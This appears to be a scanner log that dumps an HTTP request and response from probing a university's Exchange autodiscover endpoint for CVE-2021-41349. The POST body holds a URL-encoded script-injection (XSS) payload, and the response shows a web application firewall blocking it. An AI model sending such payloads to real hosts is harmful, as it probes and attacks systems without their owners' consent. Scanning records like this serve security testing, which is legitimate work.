[CVE-2021-41349] Dumped HTTP request for https://law.app.unimelb.edu.au/autodiscover/autodiscover.json


POST /autodiscover/autodiscover.json HTTP/1.1
Host: law.app.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 66
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1
[CVE-2021-41349] Dumped HTTP response https://law.app.unimelb.edu.au/autodiscover/autodiscover.json

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 835
Cache-Control: no-cache, no-store
Content-Type: text/html
Set-Cookie: visid_incap_3148830=3uz1rSlmTLumxpqaVJ4u6BZyk2gAAAAAQUIPAAAAAABP1xFyyP3aMeKaEDifUWPU; expires=Thu, 06 Aug 2026 08:08:47 GMT; HttpOnly; path=/; Domain=.app.unimelb.edu.au; Secure; SameSite=None
Set-Cookie: incap_ses_1540_3148830=2LI0GBGJOTVD4mxVQi5fFRZyk2gAAAAAyRNBlUSMmFUUbJCdDX6ZoQ==; path=/; Domain=.app.unimelb.edu.au; Secure; SameSite=None
Strict-Transport-Security: max-age=31536000
X-Iinfo: 6-4131417-0 NNNN RT(1754493462833 10) q(0 0 -1 -1) r(0 -1) B15(1,502,52) U24

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script src="/faile-to-of-almost-ther-th-to-a-Racessage-and-dy" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=6-4131417-0%20NNNN%20RT%281754493462833%2010%29%20q%280%200%20-1%20-1%29%20r%280%20-1%29%20B15%281%2c502%2c52%29%20U24&incident_id=1540000460019851443-20105884474805126&edet=15&cinfo=01000000d63f&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 1540000460019851443-20105884474805126</iframe></body></html>
